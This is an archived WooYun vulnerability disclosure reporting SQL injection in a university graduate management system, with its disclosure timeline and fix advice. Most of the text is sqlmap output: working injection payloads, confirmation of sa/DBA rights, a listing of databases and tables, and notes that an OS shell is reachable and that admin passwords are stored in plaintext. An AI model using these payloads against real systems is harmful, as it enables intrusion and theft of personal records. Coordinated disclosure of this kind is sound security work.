乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-18: 细节已通知厂商并且等待厂商处理中 2016-01-19: 厂商已经确认,细节仅向厂商公开 2016-01-29: 细节向核心白帽子及相关领域专家公开 2016-02-08: 细节向普通白帽子公开 2016-02-18: 细节向实习白帽子公开 2016-03-04: 细节向公众公开
存在SQL注入,DBA权限,泄漏大量信息。应该是越权访问的!~~~
注入点:
**.**.**.**:8080/Gmis/pygl/kclbtj_mc.aspx?kclb=A
kclb存在注入!~~~
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: kclb Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: kclb=A' AND 4392=4392 AND 'ojfl'='ojfl Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: kclb=A' AND 7018=CONVERT(INT,(SELECT CHAR(113)+CHAR(100)+CHAR(110)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7018=7018) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(116)+CHAR(118)+CHAR(100)+CHAR(113))) AND 'wIHJ'='wIHJ Type: UNION query Title: Generic UNION query (NULL) - 10 columns Payload: kclb=A' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(100)+CHAR(110)+CHAR(107)+CHAR(113)+CHAR(103)+CHAR(103)+CHAR(70)+CHAR(85)+CHAR(114)+CHAR(115)+CHAR(68)+CHAR(73)+CHAR(107)+CHAR(117)+CHAR(113)+CHAR(116)+CHAR(118)+CHAR(100)+CHAR(113),NULL,NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: kclb=A'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: kclb=A' WAITFOR DELAY '0:0:5'-----[03:56:24] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[03:56:24] [INFO] testing Microsoft SQL Server[03:56:24] [INFO] confirming Microsoft SQL Server[03:56:25] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[03:56:25] [INFO] fetching current usercurrent user: 'sa'[03:56:25] [INFO] fetching current databasecurrent database: 'Gmis'[03:56:25] [INFO] testing if current user is DBAcurrent user is DBA: Truedatabase management system users [2]:[*] sa[*] user_yjsavailable databases [6]:[*] Gmis[*] master[*] model[*] msdb[*] serverdb[*] tempdbDatabase: Gmis+--------------------------+---------+| Table | Entries |+--------------------------+---------+| dbo.ssActLog | 123608 || dbo.v_py_cj | 102036 || dbo.v_py_pyjh | 95301 || dbo.py_cj2011back | 26208 || dbo.xj_xszcxx | 12942 || dbo.v_xjexp | 9909 || dbo.viw_yytk_rxsforrxkl | 9909 || cwc.sharestu | 8574 || dbo.xj1 | 5435 || dbo.py_pyfa_m | 3778 || dbo.py_pyfa_m | 3778 || dbo.v_py_kkbj | 3599 || dbo.dm_xzqh | 3523 || dbo.xj_jxjxsfpjlb | 2864 || dbo.py_cj_jxs | 2573 || dbo.py_cj_jxs | 2573 || dbo.dm_jg | 2553 || dbo.xk_ssdssqb_fblwqk | 2084 || dbo.DM_GDYXDW | 1909 || dbo.py_kc_xslb | 1888 || dbo.py_kc_OK0426 | 1705 || dbo.py_kc_OK0426 | 1705 || dbo.py_kcbak | 1705 || dbo.xk_ssdssqb_zyxlyjl | 1556 || dbo.jsbh_dsbh | 1478 || dbo.t_comm_groupmodule | 1294 || dbo.xk_ssdssqb_jsnzsssqk | 1279 || dbo.PY_PYJH_tmp | 1210 || dbo.xk_ssdssqb_zjkc | 1147 || dbo.dm_xsxwzy | 1080 || dbo.xsuser1 | 1029 || dbo.xsuser1 | 1029 || dbo.py_xs_zy | 1012 || dbo.py_xs_zy | 1012 || dbo.t_comm_useringroup | 978 || dbo.sys_user | 974 || dbo.PY_RKJS | 941 || dbo.v_dsxx | 910 || dbo.xk_dsxx | 910 || dbo.xk_ssdssqb_zczdgcqk | 860 || dbo.xk_ssdssqb_mqcdxm | 815 || dbo.xj_tmp | 767 || dbo.py_cxxsjl | 732 || dbo.xkdsxxback2013 | 711 || dbo.v_kcml | 705 || dbo.py_cj_temp | 565 || dbo.xj5 | 550 || dbo.py_cj_xgjl | 480 || dbo.XK_XWZYDM | 431 || dbo.xk_ssdssqb_jsnqkhz | 374 || dbo.xk_ssdssqb_cghjqk | 347 || dbo.t_comm_module | 345 || dbo.dsbh1 | 333 || dbo.dseid | 333 || dbo.xk_ssdssqb_xzry | 309 || dbo.dm_dwlsbm | 290 || dbo.xk_ssdssqb_cbzzjcqk | 288 || dbo.py_zy_zyjs | 263 || dbo.py_zy_zyjs | 263 || dbo.DM_ZYJSZW | 255 || dbo.v_zy | 250 || dbo.DM_GB | 239 || dbo.xk_bsdssqb_fblwqk | 203 || dbo.py_xscjxshddjb | 195 || dbo.kckc | 161 || dbo.xk_ssdssqb_xzzdssqk | 160 || dbo.PY_JSJBXX | 138 || dbo.v_xj_xjyd | 120 || dbo.xj_xjyd | 120 || **.**.**.**mon_table_field | 99 || **.**.**.**mon_table_field | 99 || dbo.XK_YJXK | 95 || dbo.c_standardCode | 83 || dbo.py_pyjh_dssh | 81 || dbo.py_pyjh_dssh | 81 || dbo.xk_bsdssqb_zyxlyjl | 78 || dbo.dataimpexp | 77 || dbo.xk_bsdssqb_jsnzsssqk | 72 || dbo.DM_MZ | 58 || dbo.jxs_zyxx | 58 || dbo.PY_DSJFBZ | 58 || dbo.kkbjxkback20121 | 56 || dbo.kkbjxkback20121 | 56 || dbo.xxlr_zdkz | 54 || dbo.xk_bsdssqb_zczdgcqk | 51 || dbo.v_py_xs | 50 || dbo.xj_tkxxb | 45 || dbo.xk_bsdssqb_zjkc | 45 || dbo.zydm | 45 || dbo.zydm | 45 || dbo.xk_bsdssqb_mqcdxm | 44 || dbo.dm_wyyzm | 43 || dbo.py_cet46 | 39 || dbo.xk_bsdssqb_cbzzjcqk | 39 || dbo.v_py_cet46 | 38 || dbo.xk_bsdssqb_cghjqk | 32 || dbo.DM_XJYD | 31 || dbo.DM_DWLB | 27 || dbo.zqsxdjb | 26 || dbo.DM_WHCD | 25 || dbo.DM_RXFS | 24 || dbo.xk_bsdssqb_xzry | 24 || dbo.DM_GBZWMC | 22 || dbo.xj_jxsjbxx | 16 || dbo.xk_bsdssqb_jwnqkhz | 16 || dbo.xw_lwktbgsqb | 16 || dbo.DM_LQLB | 15 || dbo.PY_tabTerm | 15 || dbo.DM_GXBYQX | 14 || dbo.XK_ML | 14 || dbo.DM_ZZMM | 13 || dbo.py_bsyyxk | 13 || dbo.dm_xxxs | 12 || dbo.dsuser2 | 12 || dbo.dsuser2 | 12 || dbo.xk_bsdssqb_xzzdbsqk | 12 || dbo.xk_bsdssqb_zyyjfx | 12 || dbo.DM_CF | 11 || dbo.DM_LWFBLB | 11 || dbo.DM_XSLY | 11 || dbo.py_zykfsz | 11 || dbo.DM_GBZWJB | 10 || dbo.py_kcjc | 10 || dbo.DM_LWHJDC | 9 || dbo.DM_XSLB | 9 || dbo.dm_yxjxjfpszb | 9 || dbo.LXGCXXB | 9 || dbo.DM_BYQX | 8 || dbo.DM_KSXZ | 8 || dbo.dm_xshjlb | 8 || dbo.DM_XWLX | 8 || dbo.jxs_bjxx | 8 || dbo.py_zxsbgdjb | 8 || dbo.t_comm_usergroup | 8 || dbo.xj_dblwxxb | 8 || dbo.xj_tdxlsb_fjxx | 8 || dbo.XK_SBXWZY | 8 || dbo.dm_cjsx | 7 || dbo.DM_JYLSFS | 7 || dbo.DM_KCLB | 7 || dbo.DM_LWHJJB | 7 || dbo.DM_LWLX | 7 || dbo.dm_mslbdm | 7 || dbo.dm_sjdj | 7 || dbo.DM_SKFS | 7 || dbo.dm_xhbpdmb | 7 || dbo.xk_bsdssqb_dblw | 7 || dbo.DM_HYZK | 6 || dbo.DM_KCJB | 6 || dbo.DM_RXKL | 6 || dbo.DM_YZJB | 6 || dbo.ZS_PublishInfo | 6 || gmis.dsuser1 | 6 || dbo.cjlrfs | 5 || dbo.DM_DSLB | 5 || dbo.dm_fkfs | 5 || dbo.DM_JKZK | 5 || dbo.DM_JSLX | 5 || dbo.dm_jxjlbdmb | 5 || dbo.DM_KSFS | 5 || dbo.dm_xxwhjl | 5 || dbo.dm_yzdmb | 5 || dbo.DM_DSFBLWQKLX | 4 || dbo.DM_JLJB | 4 || dbo.DM_JLJB | 4 || dbo.DM_JSXY | 4 || dbo.DM_LWXTLY | 4 || dbo.DM_ZGXW | 4 || dbo.dm_zjlxm | 4 || dbo.py_bjpyjh | 4 || dbo.py_sjhjdjb | 4 || dbo.XW_LWCGHJQK | 4 || dbo.XW_LWCGHJQK | 4 || dbo.dm_gzxz | 3 || dbo.DM_LWSLQK | 3 || dbo.DM_RXQSF | 3 || dbo.dm_szlb | 3 || dbo.dm_xffylb | 3 || dbo.DM_XXFS | 3 || dbo.message_jsr | 3 || dbo.py_wxydbgjlb | 3 || dbo.py_xszqkhjlb | 3 || dbo.xj_ptjxjfpszb | 3 || dbo.xk_bsdssqb_jbxx | 3 || dbo.xk_gclydm | 3 || dbo.xk_ssdssqb_jbxx | 3 || dbo.ZS_SCBG | 3 || dbo.by_dbwyhxx | 2 || dbo.DCLB | 2 || dbo.DM_HKXZ | 2 || dbo.dm_sjlb | 2 || dbo.message_qx | 2 || dbo.TZGG | 2 || dbo.dm_gxbsdjlb | 1 || dbo.dm_xxdd | 1 || dbo.dm_xxdd | 1 || dbo.dt_dzbxx | 1 || dbo.py_sjhjxshdxf | 1 || dbo.py_xsyymxmd | 1 || dbo.syspara | 1 || dbo.v_current_term | 1 || dbo.v_xj_cfxx | 1 || dbo.v_xj_cfxx | 1 || dbo.xj_cfxx | 1 || dbo.xj_cfxx | 1 || dbo.xj_zyxwbjxx | 1 || dbo.XK_XWH | 1 || dbo.xw_bslwdb_xstl | 1 || dbo.xw_bslwdbzp | 1 || dbo.xw_lwdbxx | 1 |+--------------------------+---------+
可os-shell
可登录任意操作!~~~管理员的也是明文,就不演示了,功能更多,任意添加删除学生信息了!~~~
限制权限,过滤修复
危害等级:中
漏洞Rank:6
确认时间:2016-01-19 15:31
通知处理中
暂无
